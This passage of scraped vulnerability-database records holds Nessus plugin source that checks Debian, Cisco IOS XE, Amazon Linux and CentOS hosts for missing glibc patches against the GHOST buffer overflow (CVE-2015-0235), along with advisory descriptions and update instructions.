script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libnss-dns-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libnss-files-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:locales\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:locales-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"eglibc-source\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"glibc-doc\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc-bin\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc-dev-bin\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-amd64\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-dbg\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-dev\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-dev-amd64\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-dev-i386\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-i386\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-i686\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-pic\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-prof\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-udeb\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-xen\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libnss-dns-udeb\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libnss-files-udeb\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"locales\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"locales-all\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"nscd\", reference:\"2.11.3-4+deb6u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:40:21", "description": "The remote Cisco device is running a version of Cisco IOS XE software that is potentially affected by a heap-based buffer overflow vulnerability in the GNU C Library (glibc) due to improperly validated user-supplied input to the __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2() functions. This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.\n\nNote that this issue only affects those IOS XE instances that are running as a 'Nova' device, and thus, if the remote IOS XE instance is not running as a 'Nova' device, consider this a false positive.", "cvss3": {"score": null, "vector": null}, "published": "2015-03-02T00:00:00", "type": "nessus", "title": "Cisco IOS XE GNU GNU C Library (glibc) Buffer Overflow (CSCus69731) (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2019-11-22T00:00:00", "cpe": ["cpe:/o:cisco:ios_xe"], "id": "CISCO-SA-20150128-GHOST-IOSXE_NOVA.NASL", "href": "https://www.tenable.com/plugins/nessus/81595", "sourceData": "#TRUSTED 70ddb6fe0d8dbc7ccaf382570f0f476d58fc99b615c444c83fb7bf51899e7714303756300409a77fbd8bd0ff36774383ecd3751628bc4ed03d7337a4e6d0034adbd1ae03e28a8eb5f737c813b05702889b5d7a64fffee4ad39c71e0a47c9354c2150ef6f089df7712e51f3b724a4bdd66332bdd7234e479a0dc98cffc3f74137a6b80be4cd00f5a4a3c0667691bd0185881b902d85912243bc9c4e7d48aeb6cf8b4fd79e7d087d2b16a1e1192b0ff922689021fb0431b1b33aefb452cd5555f424328105481ff422b0183ac870cbd8a5050ea3ce13749849d5d7d3adcd3be86e705182abf147b35679ee304a817dd50de295f4c5a375fbf7a47df6dffeb42debea8f7e74ac82e35b9fd000fa8d3a09f097afad89d1d457e665aa50bfc88be38faf61e78802427d610616dea79ab04b76a97a1e2759af0a0584ce16df3b073e87b3996645c1478ef9851ec17b739e2583d04afc4529eaf7dc48e095aa790b9c2833146f7ef1d4e95ba795944dce1ac9cb2b992063288dcc41c16889c66b8a5cf3ac9cc5572a3b9c66631f95bfc1eadb5dd5bfa92914cdc3fd0f2cb181bad342f7e83e758da4884dd5091309c77a56bd79f2d87d5936b5c703b241219394b4003b4873f8657c366f30ca5eda4b3faa75dbdea0d3be7667f0bd8139dd221fff4b8e7d90efbe30a433799c0c1fdcc687deab476fd1040626779547e72a98f337edff\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81595);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus69731\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150128-ghost\");\n\n script_name(english:\"Cisco IOS XE GNU GNU C Library (glibc) Buffer Overflow (CSCus69731) (GHOST)\");\n script_summary(english:\"Checks IOS XE version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Cisco device is running a version of Cisco IOS XE software\nthat is potentially affected by a heap-based buffer overflow\nvulnerability in the GNU C Library (glibc) due to improperly\nvalidated user-supplied input to the __nss_hostname_digits_dots(),\ngethostbyname(), and gethostbyname2() functions. This allows a remote\nattacker to cause a buffer overflow, resulting in a denial of service\ncondition or the execution of arbitrary code.\n\nNote that this issue only affects those IOS XE instances that are\nrunning as a 'Nova' device, and thus, if the remote IOS XE instance\nis not running as a 'Nova' device, consider this a false positive.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCus69731\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd2144f8\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in Cisco bug ID CSCus69731.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/02\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:ios_xe\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ios_xe_version.nasl\");\n script_require_keys(\"Host/Cisco/IOS-XE/Version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\ninclude(\"cisco_kb_cmd_func.inc\");\n\n# Bug notes these are affected on 'Nova' devices\n# only.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nversion = get_kb_item_or_exit(\"Host/Cisco/IOS-XE/Version\");\n\n# Per Bug CSCus69731 (converted from IOS vers)\n# No model restrictions listed\n# Further note that IOS version '15.0(2)EX'\n# is not mapped and thus, omitted.\nif (\n version == \"3.1.0SG\" ||\n version == \"3.2.0SE\" ||\n version == \"3.2.0SG\" ||\n version == \"3.2.0XO\" ||\n version == \"3.3.0SE\" ||\n version == \"3.3.0XO\" ||\n version == \"3.4.0SG\" ||\n version == \"3.5.0E\" ||\n version == \"3.6.0E\" ||\n version == \"3.7.0E\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Cisco bug ID : CSCus69731' +\n '\\n Installed release : ' + version +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(port:0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:42:34", "description": "A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call to either of these functions can use this flaw to execute arbitrary code with the permissions of the user running the application.\n\nSpecial notes :\n\nBecause of the exceptional nature of this security event, we have backfilled our 2014.03 and 2013.09 Amazon Linux AMI repositories with new glibc packages that fix CVE-2015-0235 .\n\nFor 2014.09 Amazon Linux AMIs, 'glibc-2.17-55.93.amzn1' addresses the CVE. Running 'yum clean all' followed by 'yum update glibc' will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2014.03 repositories, the same 'glibc-2.17-55.93.amzn1' addresses the CVE. Running 'yum clean all' followed by 'yum update glibc' will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2013.09 repositories, 'glibc-2.12-1.149.49.amzn1' addresses the CVE. Running 'yum clean all' followed by 'yum update glibc' will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2013.03, 2012.09, 2012.03, or 2011.09 repositories, run 'yum clean all' followed by 'yum\n--releasever=2013.09 update glibc' to install the updated glibc package. You should reboot your instance after installing the update.\n\nIf you are using a pre-2011.09 Amazon Linux AMI, then you are using a version of the Amazon Linux AMI that was part of our public beta, and we encourage you to move to a newer version of the Amazon Linux AMI as soon as possible.", "cvss3": {"score": null, "vector": null}, "published": "2015-01-27T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : glibc (ALAS-2015-473)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2018-06-27T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:glibc", "p-cpe:/a:amazon:linux:glibc-common", "p-cpe:/a:amazon:linux:glibc-debuginfo", "p-cpe:/a:amazon:linux:glibc-debuginfo-common", "p-cpe:/a:amazon:linux:glibc-devel", "p-cpe:/a:amazon:linux:glibc-headers", "p-cpe:/a:amazon:linux:glibc-static", "p-cpe:/a:amazon:linux:glibc-utils", "p-cpe:/a:amazon:linux:nscd", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2015-473.NASL", "href": "https://www.tenable.com/plugins/nessus/81024", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-473.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81024);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/06/27 18:42:24\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"ALAS\", value:\"2015-473\");\n\n script_name(english:\"Amazon Linux AMI : glibc (ALAS-2015-473)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call to either of these functions\ncan use this flaw to execute arbitrary code with the permissions of\nthe user running the application.\n\nSpecial notes :\n\nBecause of the exceptional nature of this security event, we have\nbackfilled our 2014.03 and 2013.09 Amazon Linux AMI repositories with\nnew glibc packages that fix CVE-2015-0235 .\n\nFor 2014.09 Amazon Linux AMIs, 'glibc-2.17-55.93.amzn1' addresses the\nCVE. Running 'yum clean all' followed by 'yum update glibc' will\ninstall the fixed package, and you should reboot your instance after\ninstalling the update.\n\nFor Amazon Linux AMIs 'locked' to the 2014.03 repositories, the same\n'glibc-2.17-55.93.amzn1' addresses the CVE. Running 'yum clean all'\nfollowed by 'yum update glibc' will install the fixed package, and you\nshould reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2013.09 repositories,\n'glibc-2.12-1.149.49.amzn1' addresses the CVE. Running 'yum clean all'\nfollowed by 'yum update glibc' will install the fixed package, and you\nshould reboot your instance after installing the update.\n\nFor Amazon Linux AMIs 'locked' to the 2013.03, 2012.09, 2012.03, or\n2011.09 repositories, run 'yum clean all' followed by 'yum\n--releasever=2013.09 update glibc' to install the updated glibc\npackage. You should reboot your instance after installing the update.\n\nIf you are using a pre-2011.09 Amazon Linux AMI, then you are using a\nversion of the Amazon Linux AMI that was part of our public beta, and\nwe encourage you to move to a newer version of the Amazon Linux AMI as\nsoon as possible.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-473.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum update glibc' to update your system. Note that you may need\nto run 'yum clean all' first. Once this update has been applied,\n'reboot your instance to ensure that all processes and daemons that\nlink against glibc are using the updated version'. On new instance\nlaunches, you should still reboot after cloud-init has automatically\napplied this update.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/AmazonLinux/release\")) audit(AUDIT_OS_NOT, \"Amazon Linux AMI\");\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\n# Checks for below glibc-2.17\nif (rpm_check(release:\"ALA\", reference:\"glibc-2.17-0.0.amzn1\"))\n{\n # Clean out initial report from first check\n __rpm_report = '';\n if (rpm_check(release:\"ALA\", reference:\"glibc-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-common-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-common-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-devel-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-headers-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-static-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-utils-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"nscd-2.12-1.149.49.amzn1\")) flag++;\n}\nelse\n{\n # Checks for glibc-2.17\n # Clean out initial report from first check\n __rpm_report = '';\n if (rpm_check(release:\"ALA\", reference:\"glibc-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-common-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-common-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-devel-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-headers-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-static-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-utils-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"nscd-2.17-55.93.amzn1\")) flag++;\n}\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:42:01", "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {"score": null, "vector": null}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "CentOS 5 : glibc (CESA-2015:0090) (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:glibc", "p-cpe:/a:centos:centos:glibc-common", "p-cpe:/a:centos:centos:glibc-devel", "p-cpe:/a:centos:centos:glibc-headers", "p-cpe:/a:centos:centos:glibc-utils", "p-cpe:/a:centos:centos:nscd", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2015-0090.NASL", "href": "https://www.tenable.com/plugins/nessus/81025", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0090 and \n# CentOS Errata and Security Advisory 2015:0090 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81025);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"RHSA\", value:\"2015:0090\");\n\n script_name(english:\"CentOS 5 : glibc (CESA-2015:0090) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-January/020906.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?93e1c138\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-common-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-devel-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-headers-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-utils-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"nscd-2.5-123.el5_11.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:42:12", "description": "From Red Hat Security Advisory 2015:0092 :\n\nUpdated glibc packages that fix one 